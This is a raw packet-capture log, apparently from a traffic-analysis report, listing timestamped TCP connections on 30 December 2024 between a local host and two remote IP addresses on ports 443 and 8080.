                                                                                                                                                                                Dec 30, 2024 19:45:59.467922926 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.467928886 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.467957020 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.467972040 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.468297005 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.468311071 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.468355894 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.468359947 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.468386889 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.468400002 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.468534946 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.468550920 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.468595982 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.468601942 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.468640089 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.468658924 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.468733072 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.571633101 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.571651936 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.571702003 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.571710110 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.571733952 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.571749926 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.571906090 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.571921110 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.571964025 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.571969986 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.572005033 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.572155952 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.572170973 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.572211981 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.572217941 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.572238922 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.572257996 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.572453022 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.572467089 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.572504997 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.572510958 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.572536945 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.572552919 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.572838068 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.572859049 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.572910070 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.572916031 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.572935104 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.572941065 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.572947025 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.572952986 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.572968960 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.572993994 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.573000908 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.573026896 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.573041916 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.573242903 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.573259115 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.573308945 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.573316097 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.573355913 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.573472977 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.573493004 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.573519945 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.573545933 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.573550940 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.573589087 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.578947067 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.675394058 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.675412893 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.675482035 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.675498009 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.675507069 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.675523996 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.675534964 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.675542116 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.675565958 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.675587893 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.675704002 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.675717115 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.675762892 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.675770998 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.675782919 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.675795078 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.675796986 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.675805092 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.675834894 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.675847054 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.675853968 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.675873041 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.675888062 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.676079988 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.676094055 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.676131010 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.676136017 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.676178932 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.676243067 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.676256895 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.676305056 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.676316023 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.676328897 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.676342964 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.676357031 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.676359892 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.676368952 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.676390886 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.676425934 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.676753044 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.676768064 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.676810980 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.676815987 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.676840067 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.676858902 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.678946972 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.761590958 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.761609077 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.761672020 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.761682987 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.761723995 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.761894941 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.761912107 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.761957884 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.761964083 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.761986971 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.762001991 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.762124062 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.762137890 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.762180090 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.762183905 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.762217045 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.762224913 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.762403965 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.762425900 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.762478113 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.762485027 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.762521982 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.762751102 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.762765884 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.762809992 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.762818098 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.762840033 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.762867928 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.762942076 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.762957096 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.762991905 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.762999058 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.763029099 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.763051033 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.763252974 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.763268948 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.763305902 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.763310909 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.763338089 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.763361931 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.763465881 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.763479948 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.763519049 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.763525963 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.763561964 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.763561964 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.764735937 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.848126888 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.848145008 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.848191977 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.848205090 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.848226070 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.848287106 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.848337889 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.848344088 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.848382950 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.848478079 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.848494053 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.848529100 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.848536015 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.848558903 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.848584890 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.848773956 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.848790884 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.848831892 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.848838091 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.848856926 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.848875999 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.849034071 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.849049091 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.849083900 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.849090099 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.849112988 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.849128008 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.850312948 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.850327969 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.850404024 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.850409985 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.850435972 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.850447893 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.850557089 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.850570917 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.850606918 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.850610018 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.850636005 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.850645065 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.850758076 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.850781918 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.850805044 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.850810051 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.850830078 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.850856066 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.851902962 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.934279919 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.934295893 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.934341908 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.934351921 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.934390068 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.934490919 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.934505939 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.934537888 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.934544086 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.934571028 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.934597015 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.934779882 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.934807062 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.934863091 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.934870958 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.934915066 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.934986115 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.935002089 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.935039997 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.935044050 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.935062885 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.935075045 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.935288906 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.935305119 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.935353994 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.935360909 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.935374022 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.935421944 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.936515093 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.936534882 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.936572075 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.936577082 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.936604977 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.936629057 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.936785936 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.936799049 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.936835051 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.936839104 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.936866999 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.936878920 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.937031031 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.937045097 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.937079906 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.937084913 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.937112093 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.937134027 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.937472105 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.940085888 CET80805007887.120.115.216192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.940141916 CET500788080192.168.2.487.120.115.216
                                                                                                                                                                                Dec 30, 2024 19:45:59.940488100 CET500788080192.168.2.487.120.115.216
                                                                                                                                                                                Dec 30, 2024 19:45:59.945333004 CET80805007887.120.115.216192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:00.020683050 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:00.020700932 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:00.020757914 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:00.020780087 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:00.020795107 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:00.020814896 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:00.020845890 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:00.020860910 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:00.020900011 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:00.020905972 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:00.020927906 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:00.020948887 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:00.021019936 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:00.021034002 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:00.021068096 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:00.021073103 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:00.021095991 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:00.021115065 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:00.021339893 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:00.021358967 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:00.021394014 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:00.021399021 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:00.021423101 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:00.021435022 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:00.021585941 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:00.021598101 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:00.021635056 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:00.021639109 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:00.021667004 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:00.021676064 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:00.022736073 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:00.022749901 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:00.022806883 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:00.022814035 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:00.022850037 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:00.023196936 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:00.023215055 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:00.023230076 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:00.023264885 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:00.023268938 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:00.023298979 CET50076443192.168.2.445.118.248.184
